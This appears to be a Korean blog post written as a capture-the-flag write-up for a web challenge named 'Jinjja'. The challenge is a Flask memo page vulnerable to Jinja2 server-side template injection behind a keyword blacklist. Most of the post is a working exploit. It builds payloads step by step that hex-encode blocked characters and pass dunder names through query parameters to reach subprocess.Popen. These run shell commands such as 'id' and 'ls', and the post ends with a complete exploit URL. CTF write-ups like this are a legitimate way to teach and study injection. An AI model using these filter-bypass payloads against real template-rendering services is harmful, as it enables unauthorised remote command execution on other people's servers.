[WEB] Jinjja (SSTI)

글쓴이 /

메모가 있다.

여러가지 필터링이 존재한다.

게다가 args도 막힌다. |join으로 하는 것도 못한다. request|attr((’ar’,’gs’)|join)|attr(’a’)

 

request|attr(%27arx67s%27)

g를 x67로 넣어주니 된다!!!!

request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27)}}&c=_

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))}}&a=__class__&b=__mro__

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))}}&a=__class__&b=__mro__

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))}}&a=__class__&b=__mro__&c=__getitem__

 

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(1)}}&a=__class__&b=__mro__&c=__getitem__

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(1)|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27d%27))()}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__

 

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(1)|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27d%27))()|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(213)}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__

 

 

{{%27%27|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27a%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27b%27))|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(1)|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27d%27))()|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27c%27))(213)(’id’,shell=True,stdout=-1)|attr(request|attr(%27arx67s%27)|attr(%27x67et%27)(%27e%27))()}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__&e=communicate

from flask import Flask, request, render_template, render_template_string

app = Flask(__name__)

@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')

@app.route('/memo', methods=['GET'])
def memo():
    
    payload = request.args.get('memo', '')
     
    if payload:
        
        blacklist = ['_', '__', '\\x5f', '\\u', 'args', 'form', '.', 'config', 'g', 'get_flashed_messages', 'url_for', '[', ']', 'byte', 'eval', '\\137']
        
        for _ in blacklist:
            if payload.lower().find(_) != -1:
                return f'Filter [{_}]'
                
        html = '''temp memo %s'''%(payload)
        
        return render_template_string(html)
    
    else:
        return 'memo xeaxb0x92xecx9dxb4 xecx97x86xecx96xb4xecx9cxa0'
    
app.run('0.0.0.0', 8080)

 

 

 

http://web.h4ckingga.me:10011/memo?memo={{''|attr(request|attr('ar\\x67s')|attr('\\x67et')('a'))|attr(request|attr('ar\\x67s')|attr('\\x67et')('b'))|attr(request|attr('ar\\x67s')|attr('\\x67et')('c'))(1)|attr(request|attr('ar\\x67s')|attr('\\x67et')('d'))()|attr(request|attr('ar\\x67s')|attr('\\x67et')('c'))(213)('ls',shell=True,stdout=-1)|attr(request|attr('ar\\x67s')|attr('\\x67et')('e'))()|attr(request|attr('ar\\x67s')|attr('\\x67et')('c'))(0)|attr('decode')('utf-8')}}&a=__class__&b=__mro__&c=__getitem__&d=__subclasses__&e=communicate

 

flag 파일을 읽으면 위와 같다.

flag 파일을 읽는 게 아니라 실행해야 flag를 얻을 수 있었다.

 

 

관련 게시물

댓글 달기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다

위로 스크롤